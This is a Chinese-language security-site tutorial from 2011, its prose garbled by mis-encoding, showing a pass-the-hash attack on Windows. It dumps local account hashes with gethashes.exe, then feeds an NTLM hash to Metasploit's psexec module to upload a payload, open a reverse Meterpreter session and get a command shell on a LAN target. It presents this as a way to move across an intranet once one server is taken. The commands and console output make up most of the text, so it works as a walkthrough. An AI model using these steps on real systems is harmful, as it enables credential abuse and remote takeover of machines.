Ê×Ò³ | °²È«ÎÄÕ | °²È«¹¤¾ß | Exploits | ±¾Õ¾Ô­´´ | ¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | °²È«ÂÛ̳
  µ±Ç°Î»ÖãºÖ÷Ò³>°²È«ÎÄÕÂ>ÎÄÕÂ×ÊÁÏ>ÈëÇÖʵÀý>ÎÄÕÂÄÚÈÝ
hash´«µÝÈëÇÖ - hashÖ±½ÓµÇ½windows
À´Ô´£ºvfocus.net ×÷Õߣºvfocus ·¢²¼Ê±¼ä£º2011-07-21  

ÏÖÔÚµÄÍøÂç¹ÜÀíÔ±°²È«·À·¶Òâʶ¿ÉνԽÀ´Ô½Ç¿.Ò»¸ö¸´ÔÓµÄÃÜÂëÊDZØÈ»µÄ.ÄÇôÔÚÉø͸ÖÐ,Èç¹ûÎÒÃÇÄõ½Á˹ÜÀíÔ±µÄHASH,ȱÔõÄÎÓ²ÅÌС¡¢´ø¿íµÍ¡¢ÅäÖÃÀÃ,ÎÞ·¨³É¹¦Æƽâ³öÀ´,Ôõô°ìÄØ?

Ö±½Ó·¢¹ý³ÌÁË...ÍøÉϹØÓÚHASH´«µÝ¹¥»÷µÄÎÄÕ½϶à,¾Í²»ËµÁË¡£ÕâÀïÑÝʾµÄÒ»¸öÇé¿öÌرðÊÊÓÃÓÚÄÚÍøÉø͸,µ±ÎÒÃÇ»ñµÃһ̨·þÎñÆ÷µÄ¹ÜÀíȨÏÞºó,¼ÌÐøÉø͸ÄÚÍøÆäËû·þÎñÆ÷.
±Ø²»¿ÉÉٵĶ¼»áÏÈ»ñÈ¡µ½±¾·þÎñÆ÷µÄ¹ÜÀíÔ±ÃÜÂëÔÙÓÃÀ´³¢ÊÔÄ¿±ê·þÎñÆ÷,¿ÉÊǵ±Æƽⲻ³öµÄʱºòÔõô°ì?ÎÒÃǾͿÉÒÔ²ÉÓÃHASH´«µÝ¹¥»÷.Ö±½ÓʹÓÃHASHµÇ½Ŀ±êÖ÷»ú,ÒòΪÎÒÃÇÖªµÀµçÄÔ±¾ÉíÐèÒªµÄ¾ÍÊÇÎÒÃÇÌṩһ·ÝºÏ·¨µÄ¾ßÓÐȨÏÞµÄHASH,ÄÇЩ¸´ÔÓµÄÊýѧÔËËã¡¢¼ÓÃÜ,Ô۲Ų»»áßÖ~
·Ï»°²»³¶,ÑÝʾ¿ªÊ¼,Ê×ÏÈ,ÎÒÔÚÎÒµÄPC£¨¼ÙÉèΪĿ±êÖ÷»ú£©
н¨Ò»¸öisoskyÓû§,²¢ÎªÖ®ÉèÖÃÃÜÂë,È»ºóͨ¹ý¸÷ÀàÈí¼þ»ñÈ¡µ½HASH


C:\>net user isosky test
The command completed successfully.


C:\>gethashes.exe $local
1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DF
B2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2
707B:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715
F954B83:::
__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE
094448:::

C:\>

È»ºóÎÒÔÙ·µ»ØÎÒµÄBTÐéÄâ»ú(¹¥»÷ÕßÖ÷»ú)ʹÓÃMSF½øÐвâÊÔ£¬MSF×Ô´øµÄPSEXECÄ£¿é¾ßÓÐHASH´«µÝ¹¥»÷¹¦ÄÜ

root@bt:~# msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12536 updated 76 days ago (2011.05.04)

Warning: This copy of the Metasploit Framework was last updated 76 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admi                                              n share

(ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentic                                              ation
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST 192.168.0.254
RHOST => 192.168.0.254
msf exploit(psexec) > set SMBUser isosky
SMBUser => isosky
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537                                            

SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                                                                  Required 

Description
   ----       ---------------                                                                                                  --------  -----

------
   RHOST      192.168.0.254                                                                                                    yes       The

target address
   RPORT      445                                                                                                              yes       Set

the SMB service port
   SHARE      ADMIN$                                                                                                           yes       The

share to connect to, can be an admin share (ADMIN$,C$,...) or a n                                              ormal read/write folder share
   SMBDomain  WORKGROUP                                                                                                        no        The

Windows domain to use for authentication
   SMBPass    01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537                                                no        The

password for the specified username
   SMBUser    isosky                                                                                                           no        The

username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
[*] Uploading payload...
[*] Created \UGdecsam.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \UGdecsam.exe...
[*] Sending stage (749056 bytes) to 192.168.0.254
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800

meterpreter > sysinfo
Computer        : ISOSKY-PC
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > shell
Process 4596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
__vmware_user__          1                        Administrator
Guest                    HelpAssistant            isosky
SUPPORT_388945a0
The command completed with one or more errors.


C:\WINDOWS\system32>

ÖÁ´Ë,ÎÒÃÇÒѾ­³É¹¦»ñµÃÄ¿±êµÄCMDSHELL ÊDz»ÊǷdz£¼òµ¥?


 
[ÍƼö] [ÆÀÂÛ(0Ìõ)] [·µ»Ø¶¥²¿] [´òÓ¡±¾Ò³] [¹Ø±Õ´°¿Ú]  
ÄäÃûÆÀÂÛ
ÆÀÂÛÄÚÈÝ£º(²»Äܳ¬¹ý250×Ö£¬ÐèÉóºËºó²Å»á¹«²¼£¬Çë×Ô¾õ×ñÊØ»¥ÁªÍøÏà¹ØÕþ²ß·¨¹æ¡£
 ¡ì×îÐÂÆÀÂÛ£º
  ÈȵãÎÄÕÂ
¡¤ÁíÀàÍøÕ¾ÈëÇÖÖ®Ò»¾ä»°Ä¾ÂíͼƬµÄ
¡¤0dayÅúÁ¿ÄÃÕ¾webshell£¬ÍÚ¾ò»úÊÇ
¡¤ÀûÓÃewebeditor 5.5 - 6.0 ¼¦Àß
¡¤OmniPeek×¥°üµÄÒ»µã¿´·¨
¡¤Ç¿´óµÄÐá̽¹¤¾ßettercapʹÓý̳Ì
¡¤WindowsϵͳÃÜÂëÆƽâÈ«¹¥ÂÔ
¡¤Æƽâ½ûÖ¹SSID¹ã²¥
¡¤XSS͵ȡÃÜÂëCookiesͨÓýű¾
¡¤XSS©¶´»ù±¾¹¥»÷´úÂë
¡¤Intel 3945ABGÓÃOmniPeek 4.1×¥
¡¤KesionCMS V7.0¿ÆÑ´ÄÚÈÝÍøÕ¾¹ÜÀí
¡¤ÆƽâÎÞÏß¹ýÂËMAC
  Ïà¹ØÎÄÕÂ
¡¤Éî¶ÈÆÊÎö¹þÏ£Öµ(hash)´«µÝ¹¥»÷
¡¤·ÖÏíÁï¿Íwww.176ku.com±»¼ì²â¹ý
¡¤NTP ReplyºéË®¹¥»÷
¡¤¶ÔĸУ.NETÍøÕ¾µÄÉø͸ ͼÎÄʵս
¡¤SSL½Ù³Ö¹¥»÷
¡¤MetasploitʹÓÃhashÖ±½ÓµÇ¼ϵͳ
¡¤ÐÇÍâ0dayʵ¼ù¼Ç¼¡¢ÌáȨ×ܽá
¡¤0dayÅúÁ¿ÄÃÕ¾webshell£¬ÍÚ¾ò»úÊÇ
¡¤dedecms 5.7ºǫ́ÄÃWEBSHELL
¡¤AccessÒç³ö+¿ç¿ãµÃµ½shell
¡¤Apache Range Header DoS Attack
¡¤Ê¹ÓÃPHPÍ»ÆÆDisable_functionsÖ´
  ÍƼö¹ã¸æ
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved